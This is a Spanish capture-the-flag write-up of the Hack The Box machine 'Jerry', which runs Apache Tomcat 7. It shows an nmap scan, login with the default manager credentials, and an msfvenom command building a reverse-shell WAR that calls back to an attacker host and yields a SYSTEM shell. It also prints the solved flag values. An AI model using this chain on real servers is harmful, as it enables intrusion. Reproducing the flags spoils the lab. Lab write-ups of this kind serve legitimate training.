Jerry
3 minutos de lectura
- SO: Windows
- Dificultad: Fácil
- Dirección IP: 10.10.10.95
- Fecha: 30 / 06 / 2018
Escaneo de puertos
# Nmap 7.92 scan initiated as: nmap -sC -sV -Pn -o nmap/targeted 10.10.10.95 -p 8080
Nmap scan report for 10.10.10.95
Host is up (0.035s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 10.93 seconds
La máquina tiene abierto el puerto 8080 (HTTP).
Enumeración
Si vamos a http://10.10.10.96:8080
, veremos la página por defecto del servidor Tomcat:
Si tratamos de ir a /manager/html
(pinchando en “Manager App”), nos pide credenciales:
Al cancelar, aparece un mensaje de error que muestra la configuración por defecto del archivo tomcat-users.xml
(y las credenciales por defecto: tomcat:s3cret
):
Podemos probar estas credenciales y ver que estamos dentro:
Acceso a la máquina
En este punto, podemos crear un archivo WAR malicioso para obtener una reverse shell en la máquina. Para ello, podemos utilizar msfvenom
como se muestra:
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.17.44 LPORT=4444 -f war -o rev.war
Payload size: 1091 bytes
Final size of war file: 1091 bytes
Saved as: rev.war
Luego subimos el archivo WAR. Y veremos la ruta /rev
:
Si accedemos a ella, obtendremos la conexión en nc
:
$ rlwrap ncat -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.95.
Ncat: Connection from 10.10.10.95:49192.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>
Escalada de privilegios
Sorprendentemente, ya somos nt authority\system
, por lo que ya hemos escalado privilegios:
C:\apache-tomcat-7.0.88>whoami
nt authority\system
Ahora tenemos que buscar las flags, que vienen juntas:
C:\apache-tomcat-7.0.88>dir C:\Users
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users
06/18/2018 11:31 PM <DIR> .
06/18/2018 11:31 PM <DIR> ..
06/18/2018 11:31 PM <DIR> Administrator
08/22/2013 06:39 PM <DIR> Public
0 File(s) 0 bytes
4 Dir(s) 2,407,866,368 bytes free
C:\apache-tomcat-7.0.88>dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users\Administrator\Desktop
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:09 AM <DIR> flags
0 File(s) 0 bytes
3 Dir(s) 2,407,866,368 bytes free
C:\apache-tomcat-7.0.88>dir C:\Users\Administrator\Desktop\flags
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 2,407,866,368 bytes free
C:\apache-tomcat-7.0.88>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e